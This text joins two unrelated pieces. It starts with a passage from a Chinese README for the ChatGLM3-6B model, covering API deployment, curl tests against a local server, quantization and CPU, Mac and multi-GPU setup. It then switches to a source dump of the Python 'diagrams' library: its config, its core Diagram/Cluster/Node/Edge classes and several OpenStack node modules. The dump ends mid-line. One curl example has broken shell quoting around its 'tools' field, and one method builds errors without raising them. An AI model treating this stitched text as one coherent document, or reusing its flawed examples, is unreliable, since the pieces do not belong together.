程序会在命令行中进行交互式的对话,在命令行中输入指示并回车即可生成回复,输入 `clear` 可以清空对话历史,输入 `stop` 终止程序。 ### LangChain Demo 代码实现请参考 [LangChain Demo](langchain_demo/README.md)。 #### 工具调用 关于工具调用的方法请参考 [工具调用](tools_using_demo/README.md)。 #### OpenAI API / Zhipu API Demo 我们已经推出了 OpenAI / ZhipuAI 格式的 开源模型 API 部署代码,可以作为任意基于 ChatGPT 的应用的后端。 目前,可以通过运行仓库中的 [api_server.py](openai_api_demo/api_server.py) 进行部署 ```shell cd openai_api_demo python api_server.py ``` 同时,我们也书写了一个示例代码,用来测试API调用的性能。 + OpenAI 测试脚本:[openai_api_request.py](openai_api_demo/openai_api_request.py) + ZhipuAI 测试脚本:[zhipu_api_request.py](openai_api_demo/zhipu_api_request.py) + 使用Curl进行测试 + chat Curl 测试 ```shell curl -X POST "http://127.0.0.1:8000/v1/chat/completions" \ -H "Content-Type: application/json" \ -d "{\"model\": \"chatglm3-6b\", \"messages\": [{\"role\": \"system\", \"content\": \"You are ChatGLM3, a large language model trained by Zhipu.AI. Follow the user's instructions carefully. Respond using markdown.\"}, {\"role\": \"user\", \"content\": \"你好,给我讲一个故事,大概100字\"}], \"stream\": false, \"max_tokens\": 100, \"temperature\": 0.8, \"top_p\": 0.8}" ```` + Standard openai interface agent-chat Curl 测试 ```shell curl -X POST "http://127.0.0.1:8000/v1/chat/completions" \ -H "Content-Type: application/json" \ -d "{\"model\": \"chatglm3-6b\", \"messages\": [{\"role\": \"user\", \"content\": \"37乘以8加7除2等于多少?\"}], "tools": [{"name": "track", "description": "追踪指定股票的实时价格", "parameters": {"type": "object", "properties": {"symbol": {"description": "需要追踪的股票代码"}}, "required": []}}, {"name": "Calculator", "description": "数学计算器,计算数学问题", "parameters": {"type": "object", "properties": {"symbol": {"description": "要计算的数学公式"}}, "required": []}} ], \"stream\": true, \"max_tokens\": 100, \"temperature\": 0.8, \"top_p\": 0.8}" ```` + Openai style custom interface agent-chat Curl 测试(你需要实现自定义的工具描述脚本openai_api_demo/tools/schema.py的内容,并且将api_server.py中AGENT_CONTROLLER指定为'true'): ```shell curl -X POST "http://127.0.0.1:8000/v1/chat/completions" \ -H "Content-Type: application/json" \ -d "{\"model\": \"chatglm3-6b\", \"messages\": [{\"role\": \"user\", \"content\": \"37乘以8加7除2等于多少?\"}], \"stream\": true, \"max_tokens\": 100, \"temperature\": 0.8, \"top_p\": 0.8}" ```` 该接口用于openai风格的自定义工具箱的自主调度。具有调度异常的自处理回复能力,无需另外实现调度算法,用户无需api_key。 + 使用Python进行测试 ```shell cd openai_api_demo python openai_api_request.py ``` 如果测试成功,则模型应该返回一段故事。 ## 低成本部署 ### 模型量化 默认情况下,模型以 FP16 精度加载,运行上述代码需要大概 13GB 显存。如果你的 GPU 显存有限,可以尝试以量化方式加载模型,使用方法如下: ```python model = AutoModel.from_pretrained("THUDM/chatglm3-6b", trust_remote_code=True).quantize(4).cuda() ``` 模型量化会带来一定的性能损失,经过测试,ChatGLM3-6B 在 4-bit 量化下仍然能够进行自然流畅的生成。 ### CPU 部署 如果你没有 GPU 硬件的话,也可以在 CPU 上进行推理,但是推理速度会更慢。使用方法如下(需要大概 32GB 内存) ```python model = AutoModel.from_pretrained("THUDM/chatglm3-6b", trust_remote_code=True).float() ``` ### Mac 部署 对于搭载了 Apple Silicon 或者 AMD GPU 的 Mac,可以使用 MPS 后端来在 GPU 上运行 ChatGLM3-6B。需要参考 Apple 的 [官方说明](https://developer.apple.com/metal/pytorch) 安装 PyTorch-Nightly(正确的版本号应该是2.x.x.dev2023xxxx,而不是 2.x.x)。 目前在 MacOS 上只支持[从本地加载模型](README.md#从本地加载模型)。将代码中的模型加载改为从本地加载,并使用 mps 后端: ```python model = AutoModel.from_pretrained("your local path", trust_remote_code=True).to('mps') ``` 加载半精度的 ChatGLM3-6B 模型需要大概 13GB 内存。内存较小的机器(比如 16GB 内存的 MacBook Pro),在空余内存不足的情况下会使用硬盘上的虚拟内存,导致推理速度严重变慢。 ### 多卡部署 如果你有多张 GPU,但是每张 GPU 的显存大小都不足以容纳完整的模型,那么可以将模型切分在多张GPU上。首先安装 accelerate: `pip install accelerate`,然后即可正常加载模型。 ### OpenVINO Demo ChatGLM3-6B 已经支持使用 OpenVINO 工具包进行加速推理,在英特尔的GPU和GPU设备上有较大推理速度提升。具体使用方法请参考 [OpenVINO Demo](Intel_device_demo/openvino_demo/README.md)。 ### TensorRT-LLM Demo ChatGLM3-6B已经支持使用 TensorRT-LLM 工具包进行加速推理,模型推理速度得到多倍的提升。具体使用方法请参考 [TensorRT-LLM Demo](tensorrt_llm_demo/tensorrt_llm_cli_demo.py) 和 官方技术文档。 ## 引用 如果你觉得我们的工作有帮助的话,请考虑引用下列论文。 ``` @misc{glm2024chatglm, title={ChatGLM: A Family of Large Language Models from GLM-130B to GLM-4 All Tools}, author={Team GLM and Aohan Zeng and Bin Xu and Bowen Wang and Chenhui Zhang and Da Yin and Diego Rojas and Guanyu Feng and Hanlin Zhao and Hanyu Lai and Hao Yu and Hongning Wang and Jiadai Sun and Jiajie Zhang and Jiale Cheng and Jiayi Gui and Jie Tang and Jing Zhang and Juanzi Li and Lei Zhao and Lindong Wu and Lucen Zhong and Mingdao Liu and Minlie Huang and Peng Zhang and Qinkai Zheng and Rui Lu and Shuaiqi Duan and Shudan Zhang and Shulin Cao and Shuxun Yang and Weng Lam Tam and Wenyi Zhao and Xiao Liu and Xiao Xia and Xiaohan Zhang and Xiaotao Gu and Xin Lv and Xinghan Liu and Xinyi Liu and Xinyue Yang and Xixuan Song and Xunkai Zhang and Yifan An and Yifan Xu and Yilin Niu and Yuantao Yang and Yueyan Li and Yushi Bai and Yuxiao Dong and Zehan Qi and Zhaoyu Wang and Zhen Yang and Zhengxiao Du and Zhenyu Hou and Zihan Wang}, year={2024}, eprint={2406.12793}, archivePrefix={arXiv}, primaryClass={id='cs.CL' full_name='Computation and Language' is_active=True alt_name='cmp-lg' in_archive='cs' is_general=False description='Covers natural language processing. Roughly includes material in ACM Subject Class I.2.7. Note that work on artificial languages (programming languages, logics, formal systems) that does not explicitly address natural-language issues broadly construed (natural-language processing, computational linguistics, speech, text retrieval, etc.) is not appropriate for this area.'} } ```
diagrams
4c2d8a3795d2a15a168224b2a5919c2950df679b
File: config.py # fmt: off ######################### # Application # ######################### APP_NAME = "diagrams" DIR_DOC_ROOT = "docs/nodes" DIR_APP_ROOT = "diagrams" DIR_RESOURCE = "resources" DIR_TEMPLATE = "templates" PROVIDERS = ( "base", "onprem", "aws", "azure", "digitalocean", "gcp", "ibm", "firebase", "k8s", "alibabacloud", "oci", "programming", "saas", "elastic", "generic", "openstack", "outscale", ) ######################### # Resource Processing # ######################### CMD_ROUND = "round" CMD_ROUND_OPTS = ("-w",) CMD_SVG2PNG = "inkscape" CMD_SVG2PNG_OPTS = ("-w", "256", "-h", "256", "--export-type", "png") CMD_SVG2PNG_IM = "convert" CMD_SVG2PNG_IM_OPTS = ("-shave", "25%x25%", "-resize", "256x256!") FILE_PREFIXES = { "onprem": (), "aws": ("Amazon-", "AWS-"), "azure": ("Azure-",), "digitalocean": (), "gcp": ("Cloud-",), "firebase": ("Cloud-",), "ibm": (), "k8s": (), "alibabacloud": (), "oci": ("OCI-icon-",), "programming": (), "saas": (), "elastic": (), "outscale": (), "generic": (), "openstack": (), } ######################### # Doc Auto Generation # ######################### TMPL_APIDOC = "apidoc.tmpl" ######################### # Class Auto Generation # ######################### TMPL_MODULE = "module.tmpl" UPPER_WORDS = { "aws": ("aws", "api", "ebs", "ec2", "efs", "emr", "rds", "ml", "mq", "nat", "vpc", "waf", "sdk"), "azure": ("ad", "b2c", "ai", "api", "cdn", "ddos", "dns", "fxt", "hana", "hd", "id", "sap", "sql", "vm", "vpn", "vpc"), "gcp": ("gcp", "ai", "api", "cdn", "dns", "gke", "gpu", "iap", "ml", "nat", "os", "sdk", "sql", "tpu", "vpn"), "firebase": ("ab", "fcm", "ml"), "k8s": ( "api", "cm", "ccm", "crb", "crd", "ds", "etcd", "hpa", "k8s", "ns", "psp", "pv", "pvc", "rb", "rs", "sa", "sc", "sts", "svc", ), "oci": ("oci", "ocid", "oke", "ocir", "ddos", "waf", "bm", "vm", "cdn", "vpn", "dns", "nat", "dms", "api", "id"), "elastic": ("apm", "siem", "ece", "eck", "sql"), "generic": ("vpn", "ios", "xen", "sql", "lxc"), "outscale": ("osc",), "openstack": ("rpm", "loci", "nfv", "ec2api"), "pve": ("pve"), "ibm": ("ibm"), } TITLE_WORDS = { "onprem": { "onprem": "OnPrem", }, "alibabacloud": { "alibabacloud": "AlibabaCloud" }, "aws": { "cloudfront": "CloudFront" }, "digitalocean": { "digitalocean": "DigitalOcean" }, "openstack": { "openstack": "OpenStack" }, "ibm": { "ibm": "IBMCloud" }, } # TODO: check if the classname exists ALIASES = { "onprem": { "analytics": { "Powerbi": "PowerBI" }, "ci": { "Circleci": "CircleCI", "Concourseci": "ConcourseCI", "Droneci": "DroneCI", "Gitlabci": "GitlabCI", "Travisci": "TravisCI", "Teamcity": "TC", "Zuulci": "ZuulCI", }, "container": { "Lxc": "LXC", "Rkt": "RKT", }, "database": { "Clickhouse": "ClickHouse", "Cockroachdb": "CockroachDB", "Couchdb": "CouchDB", "Hbase": "HBase", "Influxdb": "InfluxDB", "Janusgraph": "JanusGraph", "Mariadb": "MariaDB", "Mongodb": "MongoDB", "Mssql": "MSSQL", "Mysql": "MySQL", "Postgresql": "PostgreSQL", }, "gitops": { "Argocd": "ArgoCD", }, "logging": { "Fluentbit": "FluentBit", "Rsyslog": "RSyslog", }, "network": { "Etcd": "ETCD", "Haproxy": "HAProxy", "OpenServiceMesh": "OSM", "Opnsense": "OPNSense", "Pfsense": "PFSense", "Vyos": "VyOS" }, "proxmox": { "Pve": "ProxmoxVE", }, "queue": { "Activemq": "ActiveMQ", "Emqx": "EMQX", "Rabbitmq": "RabbitMQ", "Zeromq": "ZeroMQ", }, "storage": { "Ceph": "CEPH", "CephOsd": "CEPH_OSD", }, "workflow": { "Kubeflow": "KubeFlow", "Nifi": "NiFi", } }, "aws": { "analytics": { "ElasticsearchService": "ES", }, "business": { "AlexaForBusiness": "A4B" }, "blockchain": { "QuantumLedgerDatabaseQldb": "QLDB" }, "compute": { "ApplicationAutoScaling": "AutoScaling", "EC2Ami": "AMI", "EC2ContainerRegistry": "ECR", "ElasticBeanstalk": "EB", "ElasticContainerService": "ECS", "ElasticKubernetesService": "EKS", "ServerlessApplicationRepository": "SAR", }, "database": { "DatabaseMigrationService": "DMS", "DocumentdbMongodbCompatibility": "DocumentDB", "DynamodbDax": "DAX", "DynamodbGlobalSecondaryIndex": "DynamodbGSI", "Database": "DB", "Dynamodb": "DDB", "Elasticache": "ElastiCache", "QuantumLedgerDatabaseQldb": "QLDB", }, "devtools": { "CommandLineInterface": "CLI", "DeveloperTools": "DevTools", }, "engagement": { "SimpleEmailServiceSes": "SES", }, "general": { "GenericOfficeBuilding": "OfficeBuilding", }, "integration": { "SimpleNotificationServiceSns": "SNS", "SimpleQueueServiceSqs": "SQS", "StepFunctions": "SF", }, "iot": { "Freertos": "FreeRTOS", "IotHardwareBoard": "IotBoard", }, "management": { "SystemsManager": "SSM", "SystemsManagerParameterStore": "ParameterStore", }, "migration": { "ApplicationDiscoveryService": "ADS", "CloudendureMigration": "CEM", "DatabaseMigrationService": "DMS", "MigrationAndTransfer": "MAT", "ServerMigrationService": "SMS", }, "ml": { "DeepLearningContainers": "DLC", }, "network": { "CloudFront": "CF", "ElasticLoadBalancing": "ELB", "ElbApplicationLoadBalancer": "ALB", "ElbClassicLoadBalancer": "CLB", "ElbNetworkLoadBalancer": "NLB", "GlobalAccelerator": "GAX", }, "security": { "CertificateManager": "ACM", "Cloudhsm": "CloudHSM", "DirectoryService": "DS", "FirewallManager": "FMS", "IdentityAndAccessManagementIamAccessAnalyzer": "IAMAccessAnalyzer", "IdentityAndAccessManagementIamAWSSts": "IAMAWSSts", "IdentityAndAccessManagementIamPermissions": "IAMPermissions", "IdentityAndAccessManagementIamRole": "IAMRole", "IdentityAndAccessManagementIam": "IAM", "KeyManagementService": "KMS", "ResourceAccessManager": "RAM", }, "storage": { "CloudendureDisasterRecovery": "CDR", "ElasticBlockStoreEBS": "EBS", "ElasticFileSystemEFS": "EFS", "Fsx": "FSx", "SimpleStorageServiceS3": "S3", }, }, "azure": { "compute": { "ContainerRegistries": "ACR", "KubernetesServices": "AKS", "VMScaleSet": "VMSS" }, }, "gcp": { "analytics": { "Bigquery": "BigQuery", "Pubsub": "PubSub", }, "compute": { "AppEngine": "GAE", "Functions": "GCF", "ComputeEngine": "GCE", "KubernetesEngine": "GKE", }, "database": { "Bigtable": "BigTable", }, "devtools": { "ContainerRegistry": "GCR", }, "ml": { "Automl": "AutoML", "NaturalLanguageAPI": "NLAPI", "SpeechToText": "STT", "TextToSpeech": "TTS", }, "network": { "VirtualPrivateCloud": "VPC" }, "security": { "KeyManagementService": "KMS", "SecurityCommandCenter": "SCC", }, "storage": { "Storage": "GCS", }, }, "firebase": { "grow": { "Messaging": "FCM" } }, "k8s": { "clusterconfig": { "Limits": "LimitRange", "HPA": "HorizontalPodAutoscaler", }, "compute": { "Deploy": "Deployment", "DS": "DaemonSet", "RS": "ReplicaSet", "STS": "StatefulSet" }, "controlplane": { "API": "APIServer", "CM": "ControllerManager", "KProxy": "KubeProxy", "Sched": "Scheduler", }, "group": { "NS": "Namespace", }, "network": { "Ep": "Endpoint", "Ing": "Ingress", "Netpol": "NetworkPolicy", "SVC": "Service", }, "podconfig": { "CM": "ConfigMap", }, "rbac": { "CRole": "ClusterRole", "CRB": "ClusterRoleBinding", "RB": "RoleBinding", "SA": "ServiceAccount", }, "storage": { "PV": "PersistentVolume", "PVC": "PersistentVolumeClaim", "SC": "StorageClass", "Vol": "Volume", }, }, "alibabacloud": { "application": { "LogService": "SLS", "MessageNotificationService": "MNS", "PerformanceTestingService": "PTS", "SmartConversationAnalysis": "SCA", }, "compute": { "AutoScaling": "ESS", "ElasticComputeService": "ECS", "ElasticContainerInstance": "ECI", "ElasticHighPerformanceComputing": "EHPC", "FunctionCompute": "FC", "OperationOrchestrationService": "OOS", "ResourceOrchestrationService": "ROS", "ServerLoadBalancer": "SLB", "ServerlessAppEngine": "SAE", "SimpleApplicationServer": "SAS", "WebAppService": "WAS", }, "database": { "DataManagementService": "DMS", "DataTransmissionService": "DTS", "DatabaseBackupService": "DBS", "DisributeRelationalDatabaseService": "DRDS", "GraphDatabaseService": "GDS", "RelationalDatabaseService": "RDS", }, "network": { "CloudEnterpriseNetwork": "CEN", "ElasticIpAddress": "EIP", "ServerLoadBalancer": "SLB", "VirtualPrivateCloud": "VPC", }, "security": { "AntiBotService": "ABS", "AntifraudService": "AS", "CloudFirewall": "CFW", "ContentModeration": "CM", "DataEncryptionService": "DES", "WebApplicationFirewall": "WAF", }, "storage": { "FileStorageHdfs": "HDFS", "FileStorageNas": "NAS", "HybridBackupRecovery": "HBR", "HybridCloudDisasterRecovery": "HDR", "ObjectStorageService": "OSS", "ObjectTableStore": "OTS", } }, "digitalocean": {}, "oci": { "compute": { "VM": "VirtualMachine", "VMWhite": "VirtualMachineWhite", "BM": "BareMetal", "BMWhite": "BareMetalWhite", "OCIR": "OCIRegistry", "OCIRWhite": "OCIRegistryWhite", "OKE": "ContainerEngine", "OKEWhite": "ContainerEngineWhite", }, "database": { "Autonomous": "ADB", "AutonomousWhite": "ADBWhite", "DatabaseService": "DBService", "DatabaseServiceWhite": "DBServiceWhite", } }, "programming": { "framework": { "Fastapi": "FastAPI", "Graphql": "GraphQL" }, "language": { "Javascript": "JavaScript", "Nodejs": "NodeJS", "Php": "PHP", "Typescript": "TypeScript" }, }, "saas": { "logging": { "Datadog": "DataDog", "Newrelic": "NewRelic" } }, "elastic": { "elasticsearch": { "Elasticsearch": "ElasticSearch", "Logstash": "LogStash", "MachineLearning": "ML", } }, "outscale": { "Osc": "OSC", }, "ibm": {}, "generic": {}, "openstack": { "user": { "Openstackclient": "OpenStackClient", }, "billing": { "Cloudkitty": "CloudKitty", }, "deployment": { "Kolla": "KollaAnsible", "Tripleo": "TripleO", } }, } File: diagrams/__init__.py import contextvars import os import uuid from pathlib import Path from typing import Dict, List, Optional, Union from graphviz import Digraph # Global contexts for a diagrams and a cluster. # # These global contexts are for letting the clusters and nodes know # where context they are belong to. So the all clusters and nodes does # not need to specify the current diagrams or cluster via parameters. __diagram = contextvars.ContextVar("diagrams") __cluster = contextvars.ContextVar("cluster") def getdiagram() -> "Diagram": try: return __diagram.get() except LookupError: return None def setdiagram(diagram: "Diagram"): __diagram.set(diagram) def getcluster() -> "Cluster": try: return __cluster.get() except LookupError: return None def setcluster(cluster: "Cluster"): __cluster.set(cluster) class Diagram: __directions = ("TB", "BT", "LR", "RL") __curvestyles = ("ortho", "curved") __outformats = ("png", "jpg", "svg", "pdf", "dot") # fmt: off _default_graph_attrs = { "pad": "2.0", "splines": "ortho", "nodesep": "0.60", "ranksep": "0.75", "fontname": "Sans-Serif", "fontsize": "15", "fontcolor": "#2D3436", } _default_node_attrs = { "shape": "box", "style": "rounded", "fixedsize": "true", "width": "1.4", "height": "1.4", "labelloc": "b", # imagepos attribute is not backward compatible # TODO: check graphviz version to see if "imagepos" is available >= 2.40 # https://github.com/xflr6/graphviz/blob/master/graphviz/backend.py#L248 # "imagepos": "tc", "imagescale": "true", "fontname": "Sans-Serif", "fontsize": "13", "fontcolor": "#2D3436", } _default_edge_attrs = { "color": "#7B8894", } # fmt: on # TODO: Label position option # TODO: Save directory option (filename + directory?) def __init__( self, name: str = "", filename: str = "", direction: str = "LR", curvestyle: str = "ortho", outformat: str = "png", autolabel: bool = False, show: bool = True, strict: bool = False, graph_attr: Optional[dict] = None, node_attr: Optional[dict] = None, edge_attr: Optional[dict] = None, ): """Diagram represents a global diagrams context. :param name: Diagram name. It will be used for output filename if the filename isn't given. :param filename: The output filename, without the extension (.png). If not given, it will be generated from the name. :param direction: Data flow direction. Default is 'left to right'. :param curvestyle: Curve bending style. One of "ortho" or "curved". :param outformat: Output file format. Default is 'png'. :param show: Open generated image after save if true, just only save otherwise. :param graph_attr: Provide graph_attr dot config attributes. :param node_attr: Provide node_attr dot config attributes. :param edge_attr: Provide edge_attr dot config attributes. :param strict: Rendering should merge multi-edges. """ if graph_attr is None: graph_attr = {} if node_attr is None: node_attr = {} if edge_attr is None: edge_attr = {} self.name = name if not name and not filename: filename = "diagrams_image" elif not filename: filename = "_".join(self.name.split()).lower() self.filename = filename self.dot = Digraph(self.name, filename=self.filename, strict=strict) # Set attributes. for k, v in self._default_graph_attrs.items(): self.dot.graph_attr[k] = v self.dot.graph_attr["label"] = self.name for k, v in self._default_node_attrs.items(): self.dot.node_attr[k] = v for k, v in self._default_edge_attrs.items(): self.dot.edge_attr[k] = v if not self._validate_direction(direction): raise ValueError(f'"{direction}" is not a valid direction') self.dot.graph_attr["rankdir"] = direction if not self._validate_curvestyle(curvestyle): raise ValueError(f'"{curvestyle}" is not a valid curvestyle') self.dot.graph_attr["splines"] = curvestyle if isinstance(outformat, list): for one_format in outformat: if not self._validate_outformat(one_format): raise ValueError(f'"{one_format}" is not a valid output format') else: if not self._validate_outformat(outformat): raise ValueError(f'"{outformat}" is not a valid output format') self.outformat = outformat # Merge passed in attributes self.dot.graph_attr.update(graph_attr) self.dot.node_attr.update(node_attr) self.dot.edge_attr.update(edge_attr) self.show = show self.autolabel = autolabel def __str__(self) -> str: return str(self.dot) def __enter__(self): setdiagram(self) return self def __exit__(self, exc_type, exc_value, traceback): self.render() # Remove the graphviz file leaving only the image. os.remove(self.filename) setdiagram(None) def _repr_png_(self): return self.dot.pipe(format="png") def _validate_direction(self, direction: str) -> bool: return direction.upper() in self.__directions def _validate_curvestyle(self, curvestyle: str) -> bool: return curvestyle.lower() in self.__curvestyles def _validate_outformat(self, outformat: str) -> bool: return outformat.lower() in self.__outformats def node(self, nodeid: str, label: str, **attrs) -> None: """Create a new node.""" self.dot.node(nodeid, label=label, **attrs) def connect(self, node: "Node", node2: "Node", edge: "Edge") -> None: """Connect the two Nodes.""" self.dot.edge(node.nodeid, node2.nodeid, **edge.attrs) def subgraph(self, dot: Digraph) -> None: """Create a subgraph for clustering""" self.dot.subgraph(dot) def render(self) -> None: if isinstance(self.outformat, list): for one_format in self.outformat: self.dot.render(format=one_format, view=self.show, quiet=True) else: self.dot.render(format=self.outformat, view=self.show, quiet=True) class Cluster: __directions = ("TB", "BT", "LR", "RL") __bgcolors = ("#E5F5FD", "#EBF3E7", "#ECE8F6", "#FDF7E3") # fmt: off _default_graph_attrs = { "shape": "box", "style": "rounded", "labeljust": "l", "pencolor": "#AEB6BE", "fontname": "Sans-Serif", "fontsize": "12", } # fmt: on # FIXME: # Cluster direction does not work now. Graphviz couldn't render # correctly for a subgraph that has a different rank direction. def __init__( self, label: str = "cluster", direction: str = "LR", graph_attr: Optional[dict] = None, ): """Cluster represents a cluster context. :param label: Cluster label. :param direction: Data flow direction. Default is 'left to right'. :param graph_attr: Provide graph_attr dot config attributes. """ if graph_attr is None: graph_attr = {} self.label = label self.name = "cluster_" + self.label self.dot = Digraph(self.name) # Set attributes. for k, v in self._default_graph_attrs.items(): self.dot.graph_attr[k] = v self.dot.graph_attr["label"] = self.label if not self._validate_direction(direction): raise ValueError(f'"{direction}" is not a valid direction') self.dot.graph_attr["rankdir"] = direction # Node must be belong to a diagrams. self._diagram = getdiagram() if self._diagram is None: raise EnvironmentError("Global diagrams context not set up") self._parent = getcluster() # Set cluster depth for distinguishing the background color self.depth = self._parent.depth + 1 if self._parent else 0 coloridx = self.depth % len(self.__bgcolors) self.dot.graph_attr["bgcolor"] = self.__bgcolors[coloridx] # Merge passed in attributes self.dot.graph_attr.update(graph_attr) def __enter__(self): setcluster(self) return self def __exit__(self, exc_type, exc_value, traceback): if self._parent: self._parent.subgraph(self.dot) else: self._diagram.subgraph(self.dot) setcluster(self._parent) def _validate_direction(self, direction: str) -> bool: return direction.upper() in self.__directions def node(self, nodeid: str, label: str, **attrs) -> None: """Create a new node in the cluster.""" self.dot.node(nodeid, label=label, **attrs) def subgraph(self, dot: Digraph) -> None: self.dot.subgraph(dot) class Node: """Node represents a node for a specific backend service.""" _provider = None _type = None _icon_dir = None _icon = None _height = 1.9 def __init__(self, label: str = "", *, nodeid: str = None, **attrs: Dict): """Node represents a system component. :param label: Node label. """ # Generates an ID for identifying a node, unless specified self._id = nodeid or self._rand_id() self.label = label # Node must be belong to a diagrams. self._diagram = getdiagram() if self._diagram is None: raise EnvironmentError("Global diagrams context not set up") if self._diagram.autolabel: prefix = self.__class__.__name__ if self.label: self.label = prefix + "\n" + self.label else: self.label = prefix # fmt: off # If a node has an icon, increase the height slightly to avoid # that label being spanned between icon image and white space. # Increase the height by the number of new lines included in the label. padding = 0.4 * (self.label.count('\n')) self._attrs = { "shape": "none", "height": str(self._height + padding), "image": self._load_icon(), } if self._icon else {} # fmt: on self._attrs.update(attrs) self._cluster = getcluster() # If a node is in the cluster context, add it to cluster. if self._cluster: self._cluster.node(self._id, self.label, **self._attrs) else: self._diagram.node(self._id, self.label, **self._attrs) def __repr__(self): _name = self.__class__.__name__ return f"<{self._provider}.{self._type}.{_name}>" def __sub__(self, other: Union["Node", List["Node"], "Edge"]): """Implement Self - Node, Self - [Nodes] and Self - Edge.""" if isinstance(other, list): for node in other: self.connect(node, Edge(self)) return other elif isinstance(other, Node): return self.connect(other, Edge(self)) else: other.node = self return other def __rsub__(self, other: Union[List["Node"], List["Edge"]]): """Called for [Nodes] and [Edges] - Self because list don't have __sub__ operators.""" for o in other: if isinstance(o, Edge): o.connect(self) else: o.connect(self, Edge(self)) return self def __rshift__(self, other: Union["Node", List["Node"], "Edge"]): """Implements Self >> Node, Self >> [Nodes] and Self Edge.""" if isinstance(other, list): for node in other: self.connect(node, Edge(self, forward=True)) return other elif isinstance(other, Node): return self.connect(other, Edge(self, forward=True)) else: other.forward = True other.node = self return other def __lshift__(self, other: Union["Node", List["Node"], "Edge"]): """Implements Self << Node, Self << [Nodes] and Self << Edge.""" if isinstance(other, list): for node in other: self.connect(node, Edge(self, reverse=True)) return other elif isinstance(other, Node): return self.connect(other, Edge(self, reverse=True)) else: other.reverse = True return other.connect(self) def __rrshift__(self, other: Union[List["Node"], List["Edge"]]): """Called for [Nodes] and [Edges] >> Self because list don't have __rshift__ operators.""" for o in other: if isinstance(o, Edge): o.forward = True o.connect(self) else: o.connect(self, Edge(self, forward=True)) return self def __rlshift__(self, other: Union[List["Node"], List["Edge"]]): """Called for [Nodes] << Self because list of Nodes don't have __lshift__ operators.""" for o in other: if isinstance(o, Edge): o.reverse = True o.connect(self) else: o.connect(self, Edge(self, reverse=True)) return self @property def nodeid(self): return self._id # TODO: option for adding flow description to the connection edge def connect(self, node: "Node", edge: "Edge"): """Connect to other node. :param node: Other node instance. :param edge: Type of the edge. :return: Connected node. """ if not isinstance(node, Node): ValueError(f"{node} is not a valid Node") if not isinstance(edge, Edge): ValueError(f"{edge} is not a valid Edge") # An edge must be added on the global diagrams, not a cluster. self._diagram.connect(self, node, edge) return node @staticmethod def _rand_id(): return uuid.uuid4().hex def _load_icon(self): basedir = Path(os.path.abspath(os.path.dirname(__file__))) return os.path.join(basedir.parent, self._icon_dir, self._icon) class Edge: """Edge represents an edge between two nodes.""" _default_edge_attrs = { "fontcolor": "#2D3436", "fontname": "Sans-Serif", "fontsize": "13", } def __init__( self, node: "Node" = None, forward: bool = False, reverse: bool = False, label: str = "", color: str = "", style: str = "", **attrs: Dict, ): """Edge represents an edge between two nodes. :param node: Parent node. :param forward: Points forward. :param reverse: Points backward. :param label: Edge label. :param color: Edge color. :param style: Edge style. :param attrs: Other edge attributes """ if node is not None: assert isinstance(node, Node) self.node = node self.forward = forward self.reverse = reverse self._attrs = {} # Set attributes. for k, v in self._default_edge_attrs.items(): self._attrs[k] = v if label: # Graphviz complaining about using label for edges, so replace it with xlabel. # Update: xlabel option causes the misaligned label position: https://github.com/mingrammer/diagrams/issues/83 self._attrs["label"] = label if color: self._attrs["color"] = color if style: self._attrs["style"] = style self._attrs.update(attrs) def __sub__(self, other: Union["Node", "Edge", List["Node"]]): """Implement Self - Node or Edge and Self - [Nodes]""" return self.connect(other) def __rsub__(self, other: Union[List["Node"], List["Edge"]]) -> List["Edge"]: """Called for [Nodes] or [Edges] - Self because list don't have __sub__ operators.""" return self.append(other) def __rshift__(self, other: Union["Node", "Edge", List["Node"]]): """Implements Self >> Node or Edge and Self >> [Nodes].""" self.forward = True return self.connect(other) def __lshift__(self, other: Union["Node", "Edge", List["Node"]]): """Implements Self << Node or Edge and Self << [Nodes].""" self.reverse = True return self.connect(other) def __rrshift__(self, other: Union[List["Node"], List["Edge"]]) -> List["Edge"]: """Called for [Nodes] or [Edges] >> Self because list of Edges don't have __rshift__ operators.""" return self.append(other, forward=True) def __rlshift__(self, other: Union[List["Node"], List["Edge"]]) -> List["Edge"]: """Called for [Nodes] or [Edges] << Self because list of Edges don't have __lshift__ operators.""" return self.append(other, reverse=True) def append(self, other: Union[List["Node"], List["Edge"]], forward=None, reverse=None) -> List["Edge"]: result = [] for o in other: if isinstance(o, Edge): o.forward = forward if forward else o.forward o.reverse = forward if forward else o.reverse self._attrs = o.attrs.copy() result.append(o) else: result.append(Edge(o, forward=forward, reverse=reverse, **self._attrs)) return result def connect(self, other: Union["Node", "Edge", List["Node"]]): if isinstance(other, list): for node in other: self.node.connect(node, self) return other elif isinstance(other, Edge): self._attrs = other._attrs.copy() return self else: if self.node is not None: return self.node.connect(other, self) else: self.node = other return self @property def attrs(self) -> Dict: if self.forward and self.reverse: direction = "both" elif self.forward: direction = "forward" elif self.reverse: direction = "back" else: direction = "none" return {**self._attrs, "dir": direction} Group = Cluster File: diagrams/openstack/containerservices.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Containerservices(_OpenStack): _type = "containerservices" _icon_dir = "resources/openstack/containerservices" class Kuryr(_Containerservices): _icon = "kuryr.png" # Aliases File: diagrams/openstack/user.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _User(_OpenStack): _type = "user" _icon_dir = "resources/openstack/user" class Openstackclient(_User): _icon = "openstackclient.png" # Aliases OpenStackClient = Openstackclient File: diagrams/openstack/billing.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Billing(_OpenStack): _type = "billing" _icon_dir = "resources/openstack/billing" class Cloudkitty(_Billing): _icon = "cloudkitty.png" # Aliases CloudKitty = Cloudkitty File: diagrams/openstack/sharedservices.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Sharedservices(_OpenStack): _type = "sharedservices" _icon_dir = "resources/openstack/sharedservices" class Barbican(_Sharedservices): _icon = "barbican.png" class Glance(_Sharedservices): _icon = "glance.png" class Karbor(_Sharedservices): _icon = "karbor.png" class Keystone(_Sharedservices): _icon = "keystone.png" class Searchlight(_Sharedservices): _icon = "searchlight.png" # Aliases File: diagrams/openstack/deployment.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _OpenStack class _Deployment(_OpenStack): _type = "deployment" _icon_dir = "resources/openstack/deployment" class Ansible(_Deployment): _icon = "ansible.png" class Charms(_Deployment): _icon = "charms.png" class Chef(_Deployment): _icon = "chef.png" class Helm(_Deployment): _icon = "helm.png" class Kolla(_Deployment): _icon = "kolla.png" class Tripleo(_Deployment): _icon = "tripleo.png" # Aliases KollaAnsible = Kolla TripleO = Tripleo File: diagrams/openstack/workloadprovisioning.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 